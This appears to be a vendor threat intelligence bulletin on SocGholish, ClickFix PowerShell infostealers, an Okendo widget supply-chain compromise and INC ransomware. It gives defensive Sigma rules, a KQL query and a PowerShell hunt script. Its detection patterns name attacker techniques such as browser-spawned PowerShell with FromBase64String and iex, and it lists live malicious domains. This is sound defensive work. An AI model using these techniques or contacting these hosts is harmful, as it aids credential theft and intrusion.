Operation Endgame Aftermath: SocGholish Disruption & AI-Generated ClickFix Infostealers

Threat Summary

Recent OTX Pulse data indicates a volatile shift in the threat landscape following law enforcement actions against TA569 (GOLD PRELUDE). While Operation Endgame successfully dismantled the SocGholish infrastructure (106 servers), threat actors are rapidly pivoting to AI-generated ClickFix campaigns and supply chain compromises to maintain their credential theft footprint.

The primary attack vectors observed include:

SocGholish Fallout: While disrupted, remnants of the fake browser update infrastructure remain active, distributing loaders for IcedID and Pikabot.
AI-Generated Typosquatting: Attackers are using AI to create high-fidelity typosquatting domains (e.g., Brazilian banks) to deploy SmartRAT via fake CAPTCHA/ClickFix techniques.
Supply Chain (Okendo): A sophisticated JavaScript injection attack targeting the Okendo Reviews widget is impacting over 18,000 e-commerce brands, delivering NetSupport and StealC.
RaaS Evolution: The INC Ransomware group (Rust-based) is aggressively exploiting CVE-2023-3519 and CVE-2024-57727 to capitalize on the void left by LockBit.

Collectively, these campaigns aim for initial access leading to credential harvesting, data exfiltration, and double-extortion ransomware.

Threat Actor / Malware Profile

GOLD PRELUDE (TA569) & SocGholish

Status: Disrupted but active remnants persist.
Distribution: Compromised WordPress sites serving fake browser update JScript payloads.
Payloads: Drops IcedID, Pikabot, Bumblebee.
Behavior: Establishes C2 for secondary payload delivery (Ransomware/Droppers).

SmartApeSG & SmartRAT

Vector: AI-generated typosquatting domains (e.g., crefisa.online).
Technique: "ClickFix" — fake browser crashes or CAPTCHAs triggering malicious PowerShell via clipboard.
Payload: SmartRAT (PowerShell-based banking trojan) and Remcos.
Capabilities: Encrypted C2, QR code interception, credential theft.

INC Ransomware

Type: Rust-based Ransomware-as-a-Service (RaaS).
Evolution: Rewritten in Rust for cross-platform (Windows/Linux/ESXi) encryption.
Access: Utilizes Cobalt Strike and exploits vulnerabilities in VPN appliances (CVE-2023-3519).

Infostealers (LummaC2, ACRStealer, StealC)

Distribution: Malicious supply chain JS (Okendo), cracked software on Mediafire/AWS S3.
Behavior: DLL side-loading, cookie/session theft, cryptocurrency wallet extraction.

IOC Analysis

The provided IOCs span multiple infrastructure types requiring immediate blocklisting:

Hostnames/Domains (C2/Infrastructure): Indicators like trademark.iglesiaelarca.com (SocGholish) and crefisa.online (SmartRAT) represent C2 infrastructure and delivery hosts. SOC teams should add these to DNS sinkholes and firewall blocklists.
URLs (Supply Chain): The api.wigetticks.com and api.wizzleticks.com endpoints are critical C2 receivers for the Okendo compromise. Blocking these at the proxy breaks the data exfiltration chain.
CVEs (Initial Access): CVE-2023-3519, CVE-2024-57727, and CVE-2025-5777 are associated with INC Ransomware initial access. Vulnerability management must prioritize these patches immediately.
File Hashes: Several MD5 and SHA256 hashes correspond to the SmartRAT droppers and INC ransomware payloads. EDR solutions should be tuned to alert on execution of these specific hashes.

Detection Engineering

Sigma Rules

YAML

title: Potential SocGholish Fake Browser Update Activity
id: 9a6c4e1c-1b2d-4c3d-8e5f-6a7b8c9d0e1f
description: Detects execution patterns associated with SocGholish fake browser updates, typically involving wscript.exe or mshta.exe launching suspicious JScript payloads.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\wscript.exe'
            - '\mshta.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'update'
            - 'install'
            - 'chrome' 
            - '.js'
    condition: selection
falsepositives:
    - Legitimate software updates initiated by browser
level: high
tags:
    - attack.initial_access
    - attack.t1189
---
title: AI-Generated ClickFix PowerShell Execution
id: b7d5e2f3-4c6a-8d9e-0f1a-2b3c4d5e6f7a
description: Detects PowerShell commands spawned by browsers characteristic of ClickFix campaigns, often involving base64 encoding or clipboard manipulation.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
    selection_image:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'FromBase64String'
            - 'clipboard'
            - 'iex'
            - 'invoke-expression'
    condition: all of selection_*
falsepositives:
    - Legitimate web-based management tools
level: critical
tags:
    - attack.execution
    - attack.t1059.001
---
title: Okendo Supply Chain Malicious JS Connection
id: c1e2d3f4-a5b6-c7d8-e9f0-1a2b3c4d5e6f
description: Detects network connections to known malicious domains associated with the Okendo Reviews widget supply chain attack.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated|equals: 'true'
        DestinationHostname|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for SocGholish and ClickFix related network connections and process creations
let SuspiciousDomains = dynamic(['trademark.iglesiaelarca.com', 'content.garretttrails.org', 'crefisa.online', 'windowsupdate-cdn.com']);
// DeviceNetworkEvents for C2 connections
DeviceNetworkEvents
| where RemoteUrl in (SuspiciousDomains) or RemoteIP in ('162.141.111.227')
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend IOCPType = 'NetworkConnection'
| union ( 
    // DeviceProcessEvents for Fake Update and PowerShell patterns
    DeviceProcessEvents
    | where (InitiatingProcessFileName in ('chrome.exe', 'firefox.exe', 'msedge.exe') and 
            (FileName in ('wscript.exe', 'mshta.exe', 'powershell.exe') or 
             ProcessCommandLine has_any ('update', 'chrome', 'FromBase64String', 'clipboard')
            )
           )
    | project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
    | extend IOCPType = 'ProcessCreation'
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell

# Hunt for SmartRAT, Remcos, and SocGholish artifacts
# Check for suspicious processes associated with the Pulse data
$suspiciousProcesses = @('powershell.exe', 'wscript.exe', 'mshta.exe', 'regsvr32.exe')
$suspiciousParents = @('chrome.exe', 'firefox.exe', 'msedge.exe')

Write-Host "Checking for processes spawned by browsers matching suspicious criteria..."
Get-Process | Where-Object { 
    $suspiciousParents -contains $_.Parent.ProcessName -and 
    $suspiciousProcesses -contains $_.ProcessName 
} | Select-Object Id, ProcessName, Parent, Path | Format-Table -AutoSize

# Check for connections to IOCs (requires admin)
$targetDomains = @('trademark.iglesiaelarca.com', 'crefisa.online', 'wigetticks.com', 'wizzleticks.com')
Write-Host "Checking active network connections for malicious domains..."
$activeConnections = Get-NetTCPConnection | Select-Object -ExpandProperty RemoteAddress | ForEach-Object { 
    try { [System.Net.Dns]::GetHostEntry($_) } catch { } 
} | Where-Object { $targetDomains -contains $_.HostName }

if ($activeConnections) {
    Write-Host "WARNING: Found active connections to known malicious domains:" -ForegroundColor Red
    $activeConnections | Select-Object HostName, AddressList
} else {
    Write-Host "No active connections to known malicious domains found."
}

# Check for SmartRAT/Remcos persistence in Registry
$regPaths = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run', 
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run')
Write-Host "Checking Registry for suspicious persistence keys..."
foreach ($path in $regPaths) {
    if (Test-Path $path) {
        Get-Item -Path $path | Select-Object -ExpandProperty Property | ForEach-Object {
            $propVal = (Get-ItemProperty -Path $path -Name $_).$_
            if ($propVal -match 'powershell' -or $propVal -match 'javascript' -or $propVal -match '.js') {
                Write-Host "Suspicious Key in $path : $_ = $propVal" -ForegroundColor Yellow
            }
        }
    }
}

Response Priorities

Immediate:
- Block all hostnames and domains listed in the IOC Analysis section at the firewall and proxy level.
- Kill any processes matching the Sigma rule patterns (browser spawning wscript/powershell) and isolate the host.
24 Hours:
- Conduct credential resets for accounts active on devices showing signs of infostealer infection (Okendo/SmartRAT).
- Review web proxy logs for connections to okendo.io widget parameters followed by connections to wigetticks.com or wizzleticks.com.
1 Week:
- Patch systems against CVE-2023-3519 and CVE-2024-57727 to mitigate INC Ransomware initial access vectors.
- Implement strict allow-listing for browser-spawned processes to prevent ClickFix and Fake Update execution chains.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub